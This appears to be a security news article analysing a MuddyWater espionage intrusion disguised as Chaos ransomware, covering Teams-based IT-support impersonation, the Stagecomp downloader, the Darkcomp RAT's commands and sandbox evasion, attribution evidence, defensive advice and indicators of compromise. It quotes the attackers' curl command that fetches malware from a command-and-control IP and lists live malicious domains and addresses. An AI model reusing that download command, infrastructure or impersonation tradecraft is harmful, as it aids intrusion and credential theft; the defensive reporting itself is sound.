An intrusion initially flagged as a Chaos ransomware attack has been unmasked as a state-sponsored espionage operation by MuddyWater (also tracked as Seedworm and Mango Sandstorm), an Iranian threat group affiliated with the Ministry of Intelligence and Security (MOIS). Rapid7 analysts, who investigated the incident in early 2026, found that no files were ever encrypted — the ransomware branding was cover for credential theft, lateral movement, and data exfiltration.
MuddyWater False Flag: Technical Details
The operation relied entirely on social engineering and legitimate tooling — no software vulnerability was exploited. Attackers initiated contact through Microsoft Teams, impersonating IT support staff and conducting interactive screen-sharing sessions with victims. During those sessions, targets were instructed to enter their credentials into text files or a phishing page (adm-pulse[.]com) styled after Microsoft Quick Assist — a remote-assistance tool built into Windows.
Once credentials were harvested, the attackers modified multi-factor authentication (MFA) settings on the compromised accounts, then used those accounts to authenticate directly to Domain Controllers over VPN. They installed two legitimate remote access tools — DWAgent and AnyDesk — for persistent access, then executed a curl command to download the primary malware from a command-and-control server at 172.86.126.208:443:
curl -o ms_upd.exe http://172.86.126.208:443/ms_upd.exe
ms_upd.exe is a downloader Rapid7 calls Stagecomp. It registers the victim with the C2 at moonzonet[.]com, polls for instructions, then downloads three components that together form the Darkcomp RAT (Remote Access Trojan — malware giving the attacker persistent remote control of an infected machine):
| File | Role | |——|——| | Game.exe | Custom RAT masquerading as Microsoft WebView2 | | WebView2Loader.dll | Legitimate Microsoft dependency used as cover | | visualwincomp.txt | Encrypted configuration file (AES-256-GCM, key in binary) |
The RAT's PDB path — the internal file path the compiler embedded during build — references the official Microsoft WebView2APISample project, confirming it was deliberately trojanized.
What the RAT Actually Does
Game.exe implements 12 commands including run_cmd, run_powershell, interactive shell sessions, file upload and deletion, and re-registration with a new agent ID. It polls uploadfiler[.]com every 60 seconds. Strings are XOR-encoded (key 0xAB), and the binary performs a series of anti-sandbox checks before executing: it looks for virtualization DLLs (vmcheck.dll, sbiedll.dll, api_log.dll), compares the CPU name against VMware, KVM, Hyper-V, and Virtual keywords, and uses GetTickCount() to detect time-skipping — a sandbox technique that fast-forwards execution to bypass timed detonation delays.
What Gave Away the False Flag
Rapid7 identified several behavioral inconsistencies that exposed this as a MuddyWater operation rather than genuine ransomware:
No encryption occurred. Despite Chaos ransomware branding, victim files remained intact. The attackers exfiltrated data and posted it on the Chaos Data Leak Site (DLS) to extort victims, but never ran a file encryptor.
Certificate fingerprint. The Stagecomp downloader was signed with a code-signing certificate issued to the identity "Donald Gay" (thumbprint B674578D4BDB24CD58BF2DC884EAA658B7AA250C). This exact identity previously signed both the Stagecomp downloader and the Darkcomp backdoor in an earlier campaign Rapid7 calls Operation Olalampo, which targeted organizations in the U.S. and Middle East/North Africa region.
Infrastructure overlap. The domain moonzonet[.]com had been observed in prior MuddyWater activity in early 2026. The hosting infrastructure was traced to RouterHosting VPS infrastructure in the UAE, consistent with MuddyWater's known operational footprint.
Tradecraft fingerprint. Injecting pythonw.exe into suspended processes — observed during lateral movement — is a documented MuddyWater behavior. Rapid7 assessed attribution at moderate confidence.
Exploitation Status and Threat Landscape
No CVE (Common Vulnerabilities and Exposures — a standardized identifier for disclosed software flaws) was exploited. MuddyWater achieved initial access entirely through social engineering. This is consistent with the group's historical preference for credential theft over vulnerability exploitation — a pattern observed in Rapid7's prior MuddyWater research.
MITRE ATT&CK (a publicly maintained framework mapping adversary tactics and techniques to standardized T-numbers) techniques observed include:
- T1566 — Phishing via Microsoft Teams
- T1219 — Remote Access Tools (DWAgent, AnyDesk)
- T1078 — Valid Accounts (stolen credentials)
- T1021.001 — Remote Desktop Protocol lateral movement
- T1041 — Exfiltration over C2 channel
- T1497 / T1622 — Virtualization/Debugger evasion
The adoption of Chaos ransomware branding follows a pattern: MuddyWater was previously linked to Qilin ransomware-as-a-service (RaaS — a model where developers license ransomware to operators for a share of proceeds) in late 2025. After that attribution became public, the group appears to have pivoted to Chaos branding to maintain deniability and obscure espionage objectives under the cover of financially motivated cybercrime.
As of late March 2026, the Chaos RaaS portal claimed 36 victims across U.S. construction, manufacturing, and business services sectors, with ransom demands reaching $300,000.
Who Is Affected
Any organization using Microsoft Teams for IT support workflows is a potential target. MuddyWater's primary focus has historically been government agencies, telecommunications providers, defense contractors, and NGOs in the Middle East, Israel, Turkey, India, and the U.S. The false flag Chaos campaign extends that reach into commercial sectors where IT support impersonation via Teams is less scrutinized.
What You Should Do Right Now
- Restrict Microsoft Teams external access. Limit who can initiate calls or screen-sharing sessions from external tenants. Go to Teams Admin Center → External Access and apply allowlists rather than permitting all external organizations.
- Enforce phishing-resistant MFA. Replace SMS/push-notification MFA with FIDO2 hardware keys or certificate-based authentication. Stolen passwords become worthless if the MFA channel cannot be intercepted.
- Block unauthorized remote access tools. If DWAgent and AnyDesk are not approved in your environment, add them to your endpoint policy blocklist now. Legitimate IT tools installed without a ticketed request are a major red flag.
- Alert on curl downloading executables. Create a SIEM (Security Information and Event Management — a platform that aggregates and correlates security logs) rule triggering on
curlorcertutilfetching.exeor.dllfiles from external IPs. - Hunt for the IOCs below. Query your EDR (Endpoint Detection and Response) for the file hashes and domains listed below. The
moonzonet[.]comanduploadfiler[.]comdomains are direct indicators of active compromise. - Review MFA configuration audit logs. MuddyWater modified MFA settings after initial access. Look for MFA changes not initiated by IT Help Desk ticket and investigate immediately.
Indicators of Compromise
File hashes (SHA-256):
ms_upd.exe(Stagecomp):24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14Game.exe(Darkcomp RAT):1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6visualwincomp.txt(encrypted config):c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0
Domains:
moonzonet[.]com— Stagecomp C2 / payload staginguploadfiler[.]com— RAT C2adm-pulse[.]com— credential phishing page
IP addresses:
172.86.126.208— malware hosting77.110.107.235— Teams attack origin93.123.39.127— Teams attack origin
Certificate thumbprint: B674578D4BDB24CD58BF2DC884EAA658B7AA250C (Donald Gay, Microsoft ID Verified CS AOC CA 02)
Background: Understanding the Risk
False flag operations in cyberspace are not new, but their use by state-sponsored actors to mask espionage as ransomware is an increasingly refined tactic. When defenders see ransomware indicators, they naturally focus on restoring systems and paying or negotiating — not on investigating what data may have been exfiltrated for intelligence purposes. By the time the victim realizes no encryption occurred and questions the attack's motive, the espionage objective is complete.
MuddyWater (Seedworm) has operated since at least 2017, conducting campaigns across the Middle East, Asia, Europe, and North America. The group is attributed to Iran's MOIS and has consistently evolved its tooling to avoid detection — moving from PowerShell-heavy scripts to Golang and C++ implants, and now to signed, trojanized Microsoft tooling. The Teams-based social engineering vector is particularly concerning because it exploits the inherent trust employees place in internal IT support channels.
The Chaos RaaS group itself is a separate entity — MuddyWater is not believed to operate the ransomware infrastructure but rather used Chaos as a convenient cover. This supply-side relationship between nation-state actors and cybercriminal infrastructure represents a blurring of espionage and cybercrime that complicates attribution and legal response.
Conclusion
Organizations relying on Microsoft Teams for IT support must treat unsolicited external Teams calls as a social engineering risk, not just a productivity tool. MuddyWater's false flag operation confirms that credential theft — not malware exploitation — remains the path of least resistance for sophisticated actors. Restricting external Teams access and eliminating push-notification MFA are the two highest-priority controls to implement immediately.
For any query contact us at contact@cipherssecurity.com
